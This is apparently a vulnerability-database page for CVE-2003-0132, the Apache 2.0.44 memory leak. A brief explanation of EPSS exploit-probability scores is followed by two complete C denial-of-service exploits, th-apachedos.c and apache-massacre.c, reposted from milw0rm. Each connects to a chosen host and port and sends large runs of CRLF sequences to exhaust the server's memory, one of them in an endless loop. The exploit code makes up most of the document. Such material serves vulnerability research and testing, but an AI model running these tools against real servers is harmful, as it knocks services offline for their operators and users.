CVE-2003-0132 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/******** th-apachedos.c ******************************************************** * * * Remote Apache DoS exploit * * ------------------------- * * Written as a poc for the: * * * This program sends 8000000 \n's to exploit the Apache memory leak. * * Works from scratch under Linux, as opposed to apache-massacre.c . * * * * Daniel Nyström <[email protected]> * * * - www.telhack.tk - * * ******************************************************** th-apachedos.c ********/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> int main(int argc, char *argv[]) { int sockfd; int count; char buffer[8000000]; struct sockaddr_in target; struct hostent *he; if (argc != 3) { fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit."); fprintf(stderr, "\n----------------------------------------------"); fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]); exit(-1); } printf("\nTH-Apache DoS\n"); printf("-------------\n"); printf("-> Starting...\n"); printf("->\n"); // memset(buffer, '\n', sizeof(buffer)); /* testing */ for (count = 0; count < 8000000;) { buffer[count] = '\r'; /* 0x0D */ count++; buffer[count] = '\n'; /* 0x0A */ count++; } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname() failed "); exit(-1); } memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(atoi(argv[2])); target.sin_addr = *((struct in_addr *)he->h_addr); printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket() failed "); exit(-1); } if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0) { perror("connect() failed "); exit(-1); } printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer)) { perror("send() failed "); exit(-1); close(sockfd); } close(sockfd); printf("-> Finished smoothly, check hosts apache...\n\n"); } // milw0rm.com [2003-04-11]

/* apache-massacre.c * Test code for Apache 2.x Memory Leak * By Matthew Murphy * * DISCLAIMER: This exploit tool is provided only to test networks for a * known vulnerability. Do not use this tool on systems you do not control, * and do not use this tool on networks you do not own without appropriate * consent from the network owner. You are responsible for any damage your * use of the tool causes. In no event may the author of this tool be held * responsible for damages relating to its use. * * As with most Apache exposures, the impacts vary between ports of the server: * * Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected * by this, as Apache's child process doesn't terminate normally unless the * parent process stops. This means that leaks (and any performance loss) hang * around until Apache is restarted. * * Unix/mpm_prefork: This MPM offers the most protection against successful * exploitation, as its processes exit at the end of the request. * * Unix/other MPMs: These other MPMs utilize multiple Apache processes for * multiple Apache requests. Depending on the MPM in use and the traffic rates * of the server, this may be used to the advantage of a potential attacker. * If multiple different Apache processes are utilized, an attacker can spread * the substantial leak between processes to dodge resource limits imposed on * httpd's UID (usually nobody, www, or apache) * * Credit: iDEFENSE reported this issue to several security lists on April 8, * 2003 following the Apache release announcement. Apache fixed the flaw about * a month after the initial disclosure of this vulnerability. iDEFENSE credits * the discovery of this vulnerability to an anonymous researcher. * * Happy Hunting! */ #ifndef _WIN32 #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/time.h> #include <netinet/in.h> #include <fcntl.h> #else #include <windows.h> #pragma comment(lib, "wsock32.lib") #endif #include <stdlib.h> #include <stdio.h> int sig_fired = 0; #ifndef _WIN32 void sig_handler(int sig) { #else BOOL WINAPI sig_handler(DWORD dwCtrlType) { #endif sig_fired = 1; #ifndef _WIN32 return; #else return TRUE; #endif } int main(int argc, char *argv[]) { SOCKET s; struct sockaddr_in sin; char buffer[1025]; struct hostent *he; unsigned short iPort = 80; int newlines = 100; char *p; char *p2; int i; #ifdef _WIN32 WSADATA wsa_prov; #endif printf("Apache Massacre v1.0\r\n"); printf("Exploit by Matthew Murphy\r\n"); printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n"); #ifdef _WIN32 if (WSAStartup(0x0101, &wsa_prov)) { perror("WSAStartup"); exit(1); } #endif printf("Please enter the web server's host/IP: "); fgets(&buffer[0], 1024, stdin); he = gethostbyname(&buffer[0]); if (!he) { perror("gethostbyname"); exit(1); } sin.sin_addr.s_addr = *((unsigned long *)he->h_addr); printf("Please enter the web server's port: "); fgets(&buffer[0], 1024, stdin); iPort = (unsigned short)atoi(&buffer[0]); #ifndef _WIN32 #ifdef _SOLARIS sigset(SIGINT, &sig_handler); #else signal(SIGINT, &sig_handler); #endif #else SetConsoleCtrlHandler(&sig_handler, TRUE); #endif printf("How many newlines should be in each request [100]: "); fgets(&buffer[0], 1024, stdin); if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) { newlines = atoi(&buffer[0]); } p = malloc(newlines*2); p2 = p; for (i = 0; i < newlines; i++) { *p2 = 0x0D; p2++; *p2 = 0x0A; p2++; } newlines += newlines; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { perror("socket"); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(iPort); if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) { perror("connect"); exit(1); } while (1) { if (!send(s, (char *)p, newlines, 0) == newlines) { perror("send"); exit(1); } if (sig_fired) { printf("Terminating on SIGINT"); free(p); #ifndef _WIN32 close(s); #else closesocket(s); WSACleanup(); #endif exit(0); } } } // milw0rm.com [2003-04-09]